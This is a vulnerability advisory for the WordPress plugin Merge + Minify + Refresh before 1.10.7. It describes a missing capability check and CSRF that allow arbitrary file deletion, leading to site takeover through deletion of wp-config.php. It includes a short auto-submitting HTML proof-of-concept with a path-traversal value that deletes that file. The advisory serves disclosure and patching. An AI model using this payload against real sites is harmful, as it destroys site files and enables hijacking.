Merge + Minify + Refresh < 1.10.7 - Authenticated Arbitrary File Delete



Description
The plugin relied on the is_admin() check, without checking the user's capabilities, when deleting arbitrary files.

The functionality was also vulnerable to Cross-site Request Forgery (CSRF) allowing attackers to delete arbitrary files by tricking authenticated users into visiting a page they controlled.

In WordPress, if the wp-config.php file is deleted, it triggers the installation process, allowing an attacker to re-install WordPress and become admin. 
Proof of Concept
    <html>
    <body>
    <form id="form" action="https://temporarycopy.local/wp-admin/admin-ajax.php" method="post">
    <input type="hidden" name="action" value="mmr_files"/>
    <input type="hidden" name="purge" value="../../wp-config.php"/>
    </form>
    <script>document.form.submit();</script>
    </body>
    </html>

Affects Plugin

fixed in version 1.10.8

References

URL https://wearetradecraft.com/advisories/tc-2020-0002/
URL https://plugins.trac.wordpress.org/changeset/2234960/merge-minify-refresh

Classification

Type AUTHBYPASS
OWASP Top 10 A2: Broken Authentication and Session Management
CWE CWE-287

Miscellaneous

Original Researcher Glyn Wintle (Tradecraft)
Views 725
Verified No
WPVDB ID 10120

Timeline

Publicly Published 2020-02-05 (4 months ago)
Added 2020-03-09 (3 months ago)
Last Updated 2020-03-10 (3 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin